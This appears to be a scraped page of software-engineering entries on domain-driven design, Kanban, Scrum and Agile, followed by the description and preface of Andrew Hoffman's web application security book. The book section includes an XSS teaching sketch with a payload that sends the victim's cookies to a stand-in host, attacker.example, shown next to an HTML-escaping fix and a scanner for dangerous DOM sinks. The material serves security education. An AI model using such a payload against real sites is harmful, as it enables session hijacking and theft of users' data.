
Strategic Design is a set of principles for maintaining model integrity, distilling the Domain Model, and working with multiple models.[citation needed]

Bounded context

Multiple models are in play on any large project. Yet when code based on distinct models is combined, software becomes buggy, unreliable, and difficult to understand. Communication among team members becomes confusing. It is often unclear in what context a model should not be applied.

Therefore: Explicitly define the context within which a model applies. Explicitly set boundaries in terms of team organization, usage within specific parts of the application, and physical manifestations such as code bases and database schemas. Keep the model strictly consistent within these bounds, but don’t be distracted or confused by issues outside and inside.

Continuous integration

When a number of people are working in the same bounded context, there is a strong tendency for the model to fragment. The bigger the team, the bigger the problem, but as few as three or four people can encounter serious problems. Yet breaking down the system into ever-smaller contexts eventually loses a valuable level of integration and coherency.

Therefore: Institute a process of merging all code and other implementation artifacts frequently, with automated tests to flag fragmentation quickly. Relentlessly exercise the ubiquitous language to hammer out a shared view of the model as the concepts evolve in different people’s heads.

Context map

An individual bounded context leaves some problems in the absence of a global view. The context of other models may still be vague and in flux.

People on other teams won’t be very aware of the context bounds and will unknowingly make changes that blur the edges or complicate the interconnections. When connections must be made between different contexts, they tend to bleed into each other.

Therefore: Identify each model in play on the project and define its bounded context. This includes the implicit models of non-object-oriented subsystems. Name each bounded context, and make the names part of the ubiquitous language. Describe the points of contact between the models, outlining explicit translation for any communication and highlighting any sharing. Map the existing terrain.

Building blocks

In the book Domain-Driven Design,[2] a number of high-level concepts and practices are articulated, such as ubiquitous language, meaning that the domain model should form a common language given by domain experts for describing system requirements, one that works equally well for the business users or sponsors and for the software developers. The book is very focused on describing the domain layer as one of the common layers in an object-oriented system with a multilayered architecture. In DDD, there are artifacts to express, create, and retrieve domain models:

  • Entity: An object that is not defined by its attributes, but rather by a thread of continuity and its identity. Example: Most airlines distinguish each seat uniquely on every flight. Each seat is an entity in this context. However, Southwest Airlines, EasyJet and Ryanair do not distinguish between every seat; all seats are the same. In this context, a seat is actually a value object.
  • Value object: An object that contains attributes but has no conceptual identity. Value objects should be treated as immutable. Example: When people exchange business cards, they generally do not distinguish between each unique card; they are only concerned about the information printed on the card. In this context, business cards are value objects.
  • Aggregate: A collection of objects that are bound together by a root entity, otherwise known as an aggregate root. The aggregate root guarantees the consistency of changes being made within the aggregate by forbidding external objects from holding references to its members. Example: When you drive a car, you do not have to worry about moving the wheels forward, making the engine combust with spark and fuel, etc.; you are simply driving the car. In this context, the car is an aggregate of several other objects and serves as the aggregate root to all of the other systems.
  • Domain Event: A domain object that defines an event (something that happens). A domain event is an event that domain experts care about.
  • Service: When an operation does not conceptually belong to any object. Following the natural contours of the problem, you can implement these operations in services. See also Service (systems architecture).
  • Repository: Methods for retrieving domain objects should delegate to a specialized Repository object such that alternative storage implementations may be easily interchanged.
  • Factory: Methods for creating domain objects should delegate to a specialized Factory object such that alternative implementations may be easily interchanged.
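
A small sketch of the entity/value object distinction in C#, loosely following the airline-seat example above; the Money and Seat types and their members are illustrative assumptions:

```csharp
using System;

// Value object: defined entirely by its attributes and treated as immutable;
// two instances with the same values are interchangeable. A C# record gives
// value-based equality for free.
public record Money(decimal Amount, string Currency);

// Entity: defined by a continuous identity, not by its attributes.
// Two seats with the same row and letter on different flights are different entities.
public class Seat
{
    public Guid Id { get; }                // identity that persists across attribute changes
    public string Row { get; private set; }
    public string Letter { get; private set; }

    public Seat(Guid id, string row, string letter)
    {
        Id = id;
        Row = row;
        Letter = letter;
    }

    public void Reassign(string row, string letter)
    {
        // Attributes change, but it is still the same seat (same Id).
        Row = row;
        Letter = letter;
    }
}
```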

Disadvantages

In order to help maintain the model as a pure and helpful language construct, the team must typically implement a great deal of isolation and encapsulation within the domain model. Consequently, a system based on domain-driven design can come at a relatively high cost. While domain-driven design provides many technical benefits, such as maintainability, Microsoft recommends that it be applied only to complex domains where the model and the linguistic processes provide clear benefits in the communication of complex information, and in the formulation of a common understanding of the domain.[3]

Relationship to other ideas

  • Object-oriented analysis and design: Although, in theory, the general idea of DDD need not be restricted to object-oriented approaches, in practice DDD seeks to exploit the advantages that object-oriented techniques make possible. These include entities/aggregate roots as receivers of commands/method invocations, the encapsulation of state within foremost aggregate roots and, on a higher architectural level, bounded contexts.
  • Model-driven engineering (MDE) and Model-driven architecture (MDA): While DDD is compatible with MDA/MDE (where MDE can be regarded as a superset of MDA), the intent of the two concepts is somewhat different. MDA is concerned more with the means of translating a model into code for different technology platforms than with the practice of defining better domain models. The techniques provided by MDE (to model domains, to create DSLs to facilitate the communication between domain experts and developers, and so on) facilitate the application of DDD in practice and help DDD practitioners to get more out of their models. Thanks to the model transformation and code generation techniques of MDE, the domain model can be used not only to represent the domain but also to generate the actual software system that will be used to manage it.
  • Plain Old Java Objects (POJOs) and Plain Old CLR Objects (POCOs): POJOs and POCOs are technical implementation concepts, specific to Java and the .NET Framework respectively. However, the emergence of the terms POJO and POCO reflects a growing view that, within the context of either of those technical platforms, domain objects should be defined purely to implement the business behaviour of the corresponding domain concept, rather than be defined by the requirements of a more specific technology framework.
  • The naked objects pattern: Based on the premise that if you have a good enough domain model, the user interface can simply be a reflection of this domain model; and that if you require the user interface to be a direct reflection of the domain model, then this will force the design of a better domain model.[4]
  • Domain-specific modeling (DSM): DSM is DDD applied through the use of domain-specific languages.
  • Domain-specific language (DSL): DDD does not specifically require the use of a DSL, though a DSL could be used to help define one and support methods like domain-specific multimodeling.
  • Aspect-oriented programming (AOP): AOP makes it easy to factor out technical concerns (such as security, transaction management, logging) from a domain model, and as such makes it easier to design and implement domain models that focus purely on the business logic.
  • Command Query Responsibility Segregation (CQRS): CQRS is an architectural pattern for separating reads from writes, where the former is a Query and the latter is a Command. Commands mutate state and are hence approximately equivalent to method invocation on aggregate roots/entities. Queries read state but do not mutate it. CQRS is a derivative architectural pattern of the design pattern called Command and Query Separation (CQS), which was coined by Bertrand Meyer. While CQRS does not require DDD, domain-driven design makes the distinction between commands and queries explicit, around the concept of an aggregate root. The idea is that a given aggregate root has a method that corresponds to a command, and a command handler invokes the method on the aggregate root. The aggregate root is responsible for performing the logic of the operation and yielding either a number of events or a failure (exception or execution result enumeration/number) response, or (if Event Sourcing is not used) just mutating its state for a persister implementation such as an ORM to write to a data store, while the command handler is responsible for pulling in infrastructure concerns related to the saving of the aggregate root’s state or events and creating the needed contexts (e.g. transactions).
  • Event Sourcing (ES): An architectural pattern which warrants that your entities (as per Eric Evans’ definition) do not track their internal state by means of direct serialization or O/R mapping, but by means of reading and committing events to an event store. Where ES is combined with CQRS and DDD, aggregate roots are responsible for thoroughly validating and applying commands (often by having their instance methods invoked from a command handler), and then publishing a single event or a set of events, which is also the foundation upon which the aggregate roots base their logic for dealing with method invocations. Hence, the input is a command and the output is one or many events, which are transactionally (single commit) saved to an event store and then often published on a message broker for the benefit of those interested (often the views are interested; they are then queried using Query-messages). When modeling your aggregate roots to output events, you can isolate the internal state even further than would be possible when projecting read-data from your entities, as is done in standard n-tier data-passing architectures. One significant benefit is that tooling such as axiomatic theorem provers (e.g. Microsoft Contracts and CHESS[5]) is easier to apply, as the aggregate root comprehensively hides its internal state. Events are often persisted based on the version of the aggregate root instance, which yields a domain model that synchronizes in distributed systems around the concept of optimistic concurrency.
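
A compact sketch of the command side of CQRS as described above, in C#. The DepositFunds command, FundsDeposited event, AccountAggregate, and the in-memory dictionary standing in for an event store are all hypothetical names invented for this illustration:

```csharp
using System;
using System.Collections.Generic;

// Command: an intent to change state.
public record DepositFunds(Guid AccountId, decimal Amount);

// Event: a fact describing what changed, suitable for an event store.
public record FundsDeposited(Guid AccountId, decimal Amount, int Version);

// Aggregate root: validates the command and yields events while applying them to itself.
public class AccountAggregate
{
    public Guid Id { get; }
    public decimal Balance { get; private set; }
    public int Version { get; private set; }

    public AccountAggregate(Guid id) => Id = id;

    public IReadOnlyList<FundsDeposited> Handle(DepositFunds command)
    {
        if (command.Amount <= 0)
            throw new InvalidOperationException("Deposit amount must be positive.");

        var evt = new FundsDeposited(Id, command.Amount, Version + 1);
        Apply(evt);
        return new[] { evt };
    }

    public void Apply(FundsDeposited evt)
    {
        Balance += evt.Amount;
        Version = evt.Version;
    }
}

// Command handler: pulls in infrastructure concerns (loading, saving, transactions)
// and delegates the domain logic to the aggregate root.
public class DepositFundsHandler
{
    private readonly Dictionary<Guid, AccountAggregate> _store = new(); // stand-in for an event store / repository

    public void Handle(DepositFunds command)
    {
        if (!_store.TryGetValue(command.AccountId, out var aggregate))
            _store[command.AccountId] = aggregate = new AccountAggregate(command.AccountId);

        // In a real system, the returned events would be appended to an event store
        // (single commit) and then published to subscribers / read-model projections.
        var events = aggregate.Handle(command);
    }
}
```

Queries would live in a separate read path that never calls Handle, which is the separation of reads from writes that the pattern names.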

Fair Use Sources:

Categories
Cloud DevOps History Software Engineering

Kanban Software Development

Return to Timeline of the History of Computers, Networking

Kanban (Japanese 看板, signboard or billboard) is a lean method to manage and improve work across human systems. This approach aims to manage work by balancing demands with available capacity, and by improving the handling of system-level bottlenecks.

Work items are visualized to give participants a view of progress and process, from start to finish—usually via a Kanban board. Work is pulled as capacity permits, rather than work being pushed into the process when requested.

In knowledge work and in software development, the aim is to provide a visual process management system which aids decision-making about what, when, and how much to produce. The underlying Kanban method originated in lean manufacturing,[1] which was inspired by the Toyota Production System.[2] Kanban is commonly used in software development in combination with other methods and frameworks such as Scrum.[3]

Fair Use Sources:

Categories
Cloud DevOps History Software Engineering

Scrum Software Development

Return to Timeline of the History of Computers, Networking

Scrum is an agile framework for developing, delivering, and sustaining complex products,[1] with an initial emphasis on software development, although it has been used in other fields including research, sales, marketing and advanced technologies.[2] It is designed for teams of ten or fewer members, who break their work into goals that can be completed within timeboxed iterations, called sprints, no longer than one month and most commonly two weeks. The Scrum Team tracks progress in 15-minute time-boxed daily meetings, called daily scrums. At the end of the sprint, the team holds a sprint review to demonstrate the work done and a sprint retrospective to improve continuously.

Fair Use Sources:

Categories
Cloud DevOps DevSecOps-Security-Privacy History Software Engineering

Agile Software Development

Return to Timeline of the History of Computers, Networking

Agile Software Development – “Agile software development — also referred to simply as Agile — is a type of development methodology that anticipates the need for flexibility and applies a level of pragmatism to the delivery of the finished product.”

Fair Use Source: 809137

In software development, agile (sometimes written Agile)[1] practices approach discovering requirements and developing solutions through the collaborative effort of self-organizing and cross-functional teams and their customer(s)/end user(s).[2] It advocates adaptive planning, evolutionary development, early delivery, and continual improvement, and it encourages flexible responses to change.[3][4][further explanation needed]

It was popularized by the Manifesto for Agile Software Development.[5] The values and principles espoused in this manifesto were derived from and underpin a broad range of software development frameworks, including Scrum and Kanban.[6][7]

While there is much anecdotal evidence that adopting agile practices and values improves the agility of software professionals, teams and organizations, the empirical evidence is mixed and hard to find.[8][9]

The Manifesto for Agile Software Development

Agile software development values

Based on their combined experience of developing software and helping others do that, the seventeen signatories to the manifesto proclaimed that they value:[5]

  • Individuals and interactions over processes and tools
  • Working software over comprehensive documentation
  • Customer collaboration over contract negotiation
  • Responding to change over following a plan

That is to say, the items on the left are valued more than the items on the right.

As Scott Ambler elucidated:[21]

  • Tools and processes are important, but it is more important to have competent people working together effectively.
  • Good documentation is useful in helping people to understand how the software is built and how to use it, but the main point of development is to create software, not documentation.
  • A contract is important but is no substitute for working closely with customers to discover what they need.
  • A project plan is important, but it must not be too rigid to accommodate changes in technology or the environment, stakeholders’ priorities, and people’s understanding of the problem and its solution.

Some of the authors formed the Agile Alliance, a non-profit organization that promotes software development according to the manifesto’s values and principles. Introducing the manifesto on behalf of the Agile Alliance, Jim Highsmith said,

The Agile movement is not anti-methodology, in fact many of us want to restore credibility to the word methodology. We want to restore a balance. We embrace modeling, but not in order to file some diagram in a dusty corporate repository. We embrace documentation, but not hundreds of pages of never-maintained and rarely-used tomes. We plan, but recognize the limits of planning in a turbulent environment. Those who would brand proponents of XP or SCRUM or any of the other Agile Methodologies as “hackers” are ignorant of both the methodologies and the original definition of the term hacker.

— Jim Highsmith, History: The Agile Manifesto[22]

Agile software development principles

The Manifesto for Agile Software Development is based on twelve principles:[23]

  1. Customer satisfaction by early and continuous delivery of valuable software.
  2. Welcome changing requirements, even in late development.
  3. Deliver working software frequently (weeks rather than months)
  4. Close, daily cooperation between business people and developers
  5. Projects are built around motivated individuals, who should be trusted
  6. Face-to-face conversation is the best form of communication (co-location)
  7. Working software is the primary measure of progress
  8. Sustainable development, able to maintain a constant pace
  9. Continuous attention to technical excellence and good design
  10. Simplicity—the art of maximizing the amount of work not done—is essential
  11. Best architectures, requirements, and designs emerge from self-organizing teams
  12. Regularly, the team reflects on how to become more effective, and adjusts accordingly

Fair Use Sources:

Categories
DevSecOps-Security-Privacy Software Engineering

Application Security Engineer

Application security engineer: “Sometimes called a “product security engineer” — a software engineer whose role is to evaluate and improve the security of an organization’s codebase and application architecture.” (B085FW7J86)

Fair Use Sources:

B085FW7J86

Categories
Bibliography Cloud DevSecOps-Security-Privacy JavaScript Software Engineering

Web Application Security – Exploitation and Countermeasures for Modern Web Applications

Return to Timeline of the History of Computers

Fair Use Source: B085FW7J86

By Andrew Hoffman

While many resources for network and IT security are available, detailed knowledge regarding modern web application security has been lacking—until now. This practical guide provides both offensive and defensive security concepts that software engineers can easily learn and apply.

Andrew Hoffman, a senior security engineer at Salesforce, introduces three pillars of web application security: recon, offense, and defense. You’ll learn methods for effectively researching and analyzing modern web applications—including those you don’t have direct access to. You’ll also learn how to break into web applications using the latest hacking techniques. Finally, you’ll learn how to develop mitigations for use in your own web applications to protect against hackers.

  • Explore common vulnerabilities plaguing today’s web applications
  • Learn essential hacking techniques attackers use to exploit applications
  • Map and document web applications for which you don’t have direct access
  • Develop and deploy customized exploits that can bypass common defenses
  • Develop and deploy mitigations to protect your applications against hackers
  • Integrate secure coding best practices into your development lifecycle
  • Get practical tips to help you improve the overall security of your web applications

From the Preface

Web Application Security walks you through a number of techniques used by talented hackers and bug bounty hunters to break into applications, then teaches you the techniques and processes you can implement in your own software to protect against such hackers.

This book is designed to be read from cover to cover, but can also be used as an on-demand reference for particular types of recon techniques, attacks, and defenses against attacks. Ultimately, this book is written to aid the reader in becoming better at web application security in a way that is practical, hands-on, and follows a logical progression such that no significant prior security experience is required.

Prerequisite Knowledge and Learning Goals

This is a book that will not only aid you in learning how to defend your web application against hackers, but will also walk you through the steps hackers take in order to investigate and break into a web application. Throughout this book we will discuss many techniques that hackers are using today to break into web applications hosted by corporations, governments, and occasionally even hobbyists. Following sufficient investigation into the previously mentioned techniques, we begin a discussion on how to secure web applications against these hackers.

In doing so you will discover brand new ways of thinking about application architecture. You will also learn how to integrate security best practices into an engineering organization. Finally, we will evaluate a number of techniques for defending against the most common and dangerous types of attacks that occur against web applications today.

After completing Web Application Security you will have the required knowledge to perform recon techniques against applications you do not have code-level access to. You will also be able to identify threat vectors and vulnerabilities in web applications, and craft payloads designed to compromise application data, interrupt execution flow, or interfere with the intended function of a web application. With these skills in hand, and the knowledge gained from the final section on securing web applications, you will be able to identify risky areas of a web application’s codebase and understand how to write code to defend against attacks that would otherwise leave your application and its users at risk.

Suggested Background

The potential audience for this book is quite broad, but the style in which the book is written and how the examples are structured should make it ideal for anyone with an intermediary-level background in software engineering.

Minimum Required Skills

In this book, an “intermediary-level background in software engineering” implies the following:

  • You can write basic CRUD (create, read, update, delete) programs in at least one programming language.
  • You can write code that runs on a server somewhere (such as backend code).
  • You can write at least some code that runs in a browser (frontend code, usually JavaScript).
  • You know what HTTP is, and can make, or at least read, GET/POST calls over HTTP in some language or framework.
  • You can write, or at least read and understand, applications that make use of both server-side and client-side code, and communicate between the two over HTTP (a minimal sketch of this baseline follows the list).
  • You are familiar with at least one popular database (MySQL, MongoDB, etc.).
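
The following minimal sketch (hypothetical, not an example from the book) shows roughly the kind of client/server round trip this baseline implies; the route name, port, and response shape are arbitrary choices for illustration.

```typescript
// A rough illustration of the baseline skills listed above: a trivial
// HTTP endpoint plus a client-style GET call against it. The route,
// port, and response shape are arbitrary and not taken from the book.
import * as http from "node:http";

// "Backend" code: answer GET /hello with a small JSON document.
const server = http.createServer((req, res) => {
  if (req.method === "GET" && req.url === "/hello") {
    res.writeHead(200, { "Content-Type": "application/json" });
    res.end(JSON.stringify({ message: "hello" }));
  } else {
    res.writeHead(404);
    res.end();
  }
});

server.listen(3000, async () => {
  // "Frontend-style" code: make an HTTP GET call and read the JSON body.
  // (Uses the global fetch available in Node 18+ and in browsers.)
  const response = await fetch("http://localhost:3000/hello");
  console.log(await response.json()); // { message: "hello" }
  server.close();
});
```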

These skills represent the minimum criteria for successfully following the examples in this book. Any experience you have beyond these bullet points is a plus and will make this book that much easier for you to consume and derive educational value from.

About the Author

Andrew Hoffman is a senior product security engineer at Salesforce.com, where he is responsible for the security of multiple JavaScript, NodeJS, and OSS teams. His expertise is in deep DOM and JavaScript security vulnerabilities. He has worked with every major browser vendor, as well as with TC39 and WHATWG, the organizations responsible for the upcoming version of JavaScript and the browser DOM spec.

Prior to this role, Andrew was a software security engineer working on Locker Service, the world’s first JavaScript namespace isolation library that operates from the interpreter level up. In parallel, Andrew also contributed to the upcoming JavaScript language security feature “Realms,” which provides language-level namespace isolation to JavaScript.

Product details:

  • Publication date : March 2, 2020
  • Print length : 331 pages
  • Publisher : O’Reilly Media; 1st edition (March 2, 2020)
  • ASIN : B085FW7J86

Who Benefits Most from Reading This Book?

Prerequisite skills aside, I believe it is important to clarify who will benefit from this book the most, so I’d like to explain who my target audience is. To do so I have structured this section in terms of learning goals and professional interests. If you don’t fit into one of the following categories, you can still learn many valuable or at least interesting concepts from this book.

This book was written to stand the test of time, so if you decide later on to pursue one of the occupations in its target audience, all of the knowledge from this book should still be relevant.

Software Engineers and Web Application Developers

I believe it would be fair to say that the primary audience for this book is an early- to mid-career software engineer or web application developer. Ideally, this reader is interested in gaining a deep understanding of either offensive techniques used by hackers, or defensive techniques used by security engineers to defend against hackers.

Often the titles “web application developer” and “software engineer” are interchangeable, which might lead to a bit of confusion considering I use both of them throughout the upcoming chapters. Let’s start off with some clarification.

Software engineers

In my mind, and for the sake of clarity, when I use the term “software engineer,” I am referring to a generalist who is capable of writing software that runs on a variety of platforms. Software engineers will benefit from this book in several ways.

First off, much of the knowledge contained in this book is transferable with minimal effort to software that does not run on the web. It is also transferable to other types of networked applications, with native mobile applications being the first that come to mind.

Furthermore, several exploits discussed in this book take advantage of server-side integrations involving communication with a web application and another software component. As a result, it is safe to consider any software that interfaces with a web application as a potential threat vector (databases, CRM, accounting, logging tools, etc.).

Web application developers

On the other hand, a “web application developer” by my definition is someone who is highly specialized in writing software that runs on the web. They are often further subdivided into frontend, backend, and full stack developers.

Historically, many attacks against web applications have targeted server-side vulnerabilities. As a result I believe this book’s use case for a backend or full stack developer is very transparent and easily understood.

I also believe this book should be valuable for other types of web application developers, including those who do not write code that runs on a server but instead runs on a web browser (frontend/JavaScript developers).

As I explain in the upcoming chapters, many of the ways in which hackers take advantage of today’s web applications originate via malicious code running in the browser. Some hackers are even taking advantage of the browser DOM or CSS stylesheets in order to attack an application’s users.

These points suggest that it is also important for frontend developers who do not write server-side code to be aware of the security risks their code may expose and how to mitigate those risks.

General Learning Goals

This book should be a fantastic resource for any of the preceding readers looking to make a career change to a more security-oriented role. It will also be valuable for those looking to learn how to beef up the defenses in their own code or in the code maintained by their organization.

If you want to defend your application against very specific exploits, this book is also for you. This book follows a unique structure, which should enable you to use it as a security reference without ever having to read any of the chapters that involve hacking. That is, of course, if that is your only goal in purchasing this book.

I would suggest reading from cover to cover for the best learning experience, but if you are looking only for a reference on securing against specific types of hacks, just flip the book halfway open and get started reading.

Security Engineers, Pen Testers, and Bug Bounty Hunters

As a result of how this book is structured, it can also be used as a resource for penetration testing, bug bounty hunting, and any other type of application-level security work. If this type of work is relevant or interesting to you, then you may find the first half of the book more to your liking.

This book will take a deep dive into how exploits work from both a code level and an architectural level rather than simply executing well-known open source software (OSS) scripts or making use of paid security automation software. Because of this there is a second audience for this book — software security engineers, IT security engineers, network security engineers, penetration testers, and bug bounty hunters.

Tip

Want to make a little bit of extra money on the side while developing your hacking skills? Read this book and then sign up for one of the bug bounty programs noted in Part III. This is a great way to help other companies improve the security of their products while developing your hacking skills and making some additional cash.

This book will be very beneficial to existing security professionals who understand conceptually how many attacks work but would like a deep dive into the systems and code behind a tool or script.

In today’s security world, it is commonplace for penetration testers to operate using a wide array of prebuilt exploit scripts. This has led to the creation of many paid and open source tools that automate classic attacks, allowing them to be run without deep knowledge of an application’s architecture or of the logic within a particular block of code.

The exploits and countermeasures contained within this book are presented without the use of any specialized tools. Instead, we will rely on our own scripts, network requests, and the tooling that comes standard in Unix-based operating systems, as well as the standard tooling present in the three major web browsers (Chrome, Firefox, and Edge).

This is not to take away from the value of specialized security tools. In fact, I think that many of them are exceptional and make delivering professional, high-quality penetration tests much easier!

Instead, the reason this book does not contain the use of specialized security tools is so that we can focus on the most important parts of finding a vulnerability, developing an exploit, prioritizing data to compromise, and making sure you can defend against all of the above. As a result, I believe that by the end of this book you will be prepared to go out into the wild and find new types of vulnerabilities, develop exploits against systems that have never been exploited before, and harden the most complex systems against the most persistent attackers.

How Is This Book Organized?

You will soon find that this book is structured quite differently than most other technology books out there. This is intentional. This book is purposefully structured so that there is a nearly 1:1 ratio of chapters regarding hacking (offense) and security (defense).

After beginning our adventure with a bit of a history lesson and some exploration into the technology, tools, and exploits of the past, we will move on to our main topic: exploitation and countermeasures for modern web applications. Hence the subtitle of this book.

The main content in this book is structured into three major parts, with each part containing many individual chapters covering a wide array of topics. Ideally, you will venture through this book in a linear fashion, from page one all the way to the final page. Reading this book in that order will provide the greatest learning possible. As mentioned earlier, this book can also be used as either a hacking reference or a security engineering reference by focusing on the first or second half, respectively.

By now you should understand how to navigate the book, so let’s go over the three main parts of this book so we can grasp the importance of each.

Recon

The first part of this book is “Recon,” where we evaluate ways to gain information regarding a web application without necessarily trying to hack it.

In “Recon,” we discuss a number of important technologies and concepts that are essential to master if you wish to become a hacker. These topics will also be important to anyone looking to lock down an existing application, because the information exposed by many of these techniques can be mitigated with appropriate planning.

I have had the opportunity to work with what I believe to be some of the best penetration testers and bug bounty hunters in the world. Through my conversations with them and my analysis of how they do their work, I’ve come to realize this topic is much more important than many other books make it out to be.

Why is recon important?

I would go so far as to say that for many of the top bug bounty hunters in the world, expert-level reconnaissance ability is what differentiates these “great” hackers from simply “good” hackers.

In other words, it’s one thing to have a fast car (in this case, perhaps knowing how to build exploits), but without knowing the most efficient route to the finish line, you may not win the race. A slower car could make it to the finish line in less time than a fast one if a more efficient path is taken.

If fantasy-based analogies hit closer to home, you could think of recon skills as something akin to a rogue in an RPG. In our case, the rogue’s job isn’t to do lots of damage, but instead to scout ahead of the group and circle back with intel. It’s the guy who helps line up the shots and figures out which battles will have the greatest rewards.

The last part in particular is exceedingly valuable, because it’s likely many types of attacks could be logged against well-defended targets. This means you might only get one chance to exploit a certain software hole before it is found and closed.

We can safely conclude that the second use of reconnaissance is figuring out how to prioritize your exploits.

If you are interested in a career as a penetration tester or a bug bounty hunter, this part of the book will be of utmost importance to you. This is largely because in the world of bug bounty hunting, and to a lesser extent penetration testing, tests are performed “black box” style. “Black box” testing is a style of testing where the tester has no knowledge of the structure and code within an app, and hence must build their own understanding of the application through careful analysis and investigation.

Offense

The second part of this book is “Offense.” Here the focus of the book moves from recon and data gathering to analyzing code and network requests. Then with this knowledge we will attempt to take advantage of insecurely written or improperly configured web applications.

Warning

A number of chapters in this book explain actual hacking techniques used by malicious black hat hackers in the real world. It is imperative that if you are testing techniques found in this book, you do so only against an application that you own or have explicit written permission to test exploits against.

Improper usage of the hacking techniques presented in this book could result in fines, jail time, etc., depending on your country’s laws on hacking activity.

In Part II, we learn how to both build and deploy exploits. These exploits are designed to steal data or forcibly change the behavior of an application.

This part of the book builds on the knowledge from Part I, “Recon.” Using our previously acquired reconnaissance skills in conjunction with newly acquired hacking skills, we will begin taking over and attacking demo web applications.

Part II is organized on an exploit-by-exploit basis. Each chapter explains in detail a different type of exploit.

These chapters start with an explanation of the exploit itself so you can understand how it works mechanically. Then we discuss how to search for vulnerabilities where this exploit can be applied. Finally, we craft a payload specific to the demo application we are exploiting. We then deploy the payload, and observe the results.

Vulnerabilities considered in depth

Cross-Site Scripting (XSS), one of the first exploits we dig into, is a type of attack that works against a wide array of web applications, but can be applied to other applications as well (e.g., mobile apps, Flash/ActionScript games, etc.). This particular attack involves writing some malicious code on your own machine, then taking advantage of poor filtration mechanisms in an app that will allow your script to execute on another user’s machine.

When we discuss an exploit like an XSS attack, we will start with a vulnerable app. This demo app will be straightforward and to the point, ideally just a few paragraphs of code. From this foundation, we will write a block of code to be injected as a payload into the demo app, which will then take advantage of a hypothetical user on the other side.
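
As a rough sketch of that pattern (hypothetical code, not the book’s demo application), consider a comment widget that interpolates user input directly into HTML, the kind of payload that abuses it, and the sort of output-encoding fix covered later in the defensive chapters:

```typescript
// Hypothetical XSS sketch, not taken from the book.
// Vulnerable: untrusted input is concatenated directly into markup, so a
// <script> payload submitted as a "comment" executes in the victim's browser.
function renderCommentUnsafe(userComment: string): string {
  return `<div class="comment">${userComment}</div>`;
}

// A classic payload: exfiltrate the victim's cookies to an attacker-controlled host.
const payload =
  `<script>new Image().src = "https://attacker.example/c?d=" + document.cookie;</script>`;

console.log(renderCommentUnsafe(payload)); // the script tag survives intact

// Mitigation (previewing the defensive chapters): encode characters the
// browser would otherwise interpret as markup before interpolating input.
function escapeHtml(input: string): string {
  return input
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderCommentSafe(userComment: string): string {
  return `<div class="comment">${escapeHtml(userComment)}</div>`;
}

console.log(renderCommentSafe(payload)); // rendered inert as plain text
```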

Sounds simple, doesn’t it? And it should be. Without any defenses, most software systems are easy to break into. As a result, with an exploit like XSS, where there are many defenses, we will progressively dig deeper and deeper into the specifics of writing and deploying an attack.

We will initially attempt to break down routine defenses and eventually move on to bypassing more advanced defense mechanisms. Remember, just because someone built a wall to defend their codebase doesn’t mean you can’t go over it or underneath it. This is where we will get to use some creativity and find some unique and interesting solutions.

Part II is important because understanding the mindset of a hacker is often vital for architecting secure codebases. It is exceptionally important for any reader interested in hacking, penetration testing, or bug bounty hunting.

Defense

The third and final part of this book, “Defense,” is about securing your own code against hackers. In Part III, we go back and look at every type of exploit we covered in Part II and attempt to consider them again with a completely opposite viewpoint. This time, we will not be concentrating on breaking into software systems, but instead attempting to prevent or mitigate the probability that a hacker could break into our systems.

In Part III you will learn how to protect against specific exploits from Part II, in addition to learning general protections that will secure your codebase against a wide variety of attacks. These general protections range from “secure by default” engineering methodologies, to secure coding best practices that can be enforced easily by an engineering team using tests and other simple automated tooling (such as a linter).
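
As one hedged illustration of what such simple automated tooling can look like (this script, its sink list, and the ./src layout are hypothetical rather than tooling from the book), a team might fail a build whenever known-dangerous DOM sinks appear in frontend source files:

```typescript
// Hypothetical build-time check, not a tool from the book: scan a source
// tree for DOM sinks that frequently lead to XSS and fail the build if any
// are found. Real teams would more likely use an established linter rule;
// the "./src" directory and sink list are illustrative assumptions.
import { readdirSync, readFileSync, statSync } from "node:fs";
import { join } from "node:path";

const DANGEROUS_SINKS = ["innerHTML", "document.write(", "eval("];

// Recursively collect .ts and .js files under a directory.
function collectSourceFiles(dir: string): string[] {
  return readdirSync(dir).flatMap((name) => {
    const path = join(dir, name);
    if (statSync(path).isDirectory()) return collectSourceFiles(path);
    return path.endsWith(".ts") || path.endsWith(".js") ? [path] : [];
  });
}

let violations = 0;
for (const file of collectSourceFiles("./src")) {
  const source = readFileSync(file, "utf8");
  for (const sink of DANGEROUS_SINKS) {
    if (source.includes(sink)) {
      console.error(`${file}: potentially unsafe sink "${sink}"`);
      violations += 1;
    }
  }
}

// A non-zero exit code makes the check easy to wire into CI or a pre-commit hook.
process.exit(violations > 0 ? 1 : 0);
```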

Beyond learning how to write more secure code, you will also learn a number of increasingly valuable tricks for catching hackers in the act and improving your organization’s attitude toward software security.

Most chapters in Part III are structured similarly to the hacking chapters in Part II. We begin with an overview of the technology and skills required to prepare a defense against a specific type of attack.

Initially we will prepare a basic-level defense, which should help mitigate attacks but may not always fend off the most persistent hackers. Finally, we will improve our defenses to the point where most, if not all, hacking attempts will be stopped.

At this point, the structure of Part III begins to differ from that of Part II as we discuss trade-offs that result from improving application security. Generally speaking, every measure that improves security carries some type of trade-off outside of security. It may not be your place to decide what level of risk your product should accept, but you should be aware of the trade-offs being made.

Often, these trade-offs come in the form of application performance. The more efforts you take to read and sanitize data, the more operations are performed outside of the standard functionality of your application. Hence a secure feature typically requires more computing resources than an insecure feature.

With additional operations also comes more code, which means more maintenance, more tests, and more engineering time. Security often adds logging and monitoring overhead on top of this development overhead as well.

Finally, some security precautions will come at the cost of reduced usability.

Trade-off evaluation

A very simple example of this process of weighing security benefits against their cost, in terms of usability and performance, is a login form. If the form displays an error message specifically indicating that a username does not exist, it becomes significantly easier for a hacker to brute force username/password combinations. This occurs because the hacker no longer has to find a list of active usernames elsewhere; the application itself confirms which accounts exist. The hacker simply needs to brute force a few usernames, which can be confirmed and logged for later break-in attempts.

Next, the hacker only needs to brute force passwords rather than username/password combinations, which shrinks the search space from every username/password pair down to just the candidate passwords for each confirmed username, taking far less time and fewer resources.

Furthermore, if the application uses an email and password scheme for login rather than a username and password scheme, then we have another problem. A hacker can use this login form to find valid email addresses that can be sold for marketing or spam purposes. Even if precautions are taken to prevent brute forcing, carefully crafted inputs (e.g., first.last@company.com, firstlast@company.com, firstl@company.com) can allow the hacker to reverse engineer the schema used for company email accounts and pinpoint the valid accounts of executives (useful for sales outreach) or of individuals with privileged access (useful for phishing).

As a result, it is often considered best practice to provide more generic error messages to the user. Of course, this change conflicts with the user experience because more specific error messages are definitely ideal for the usability of your application.
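
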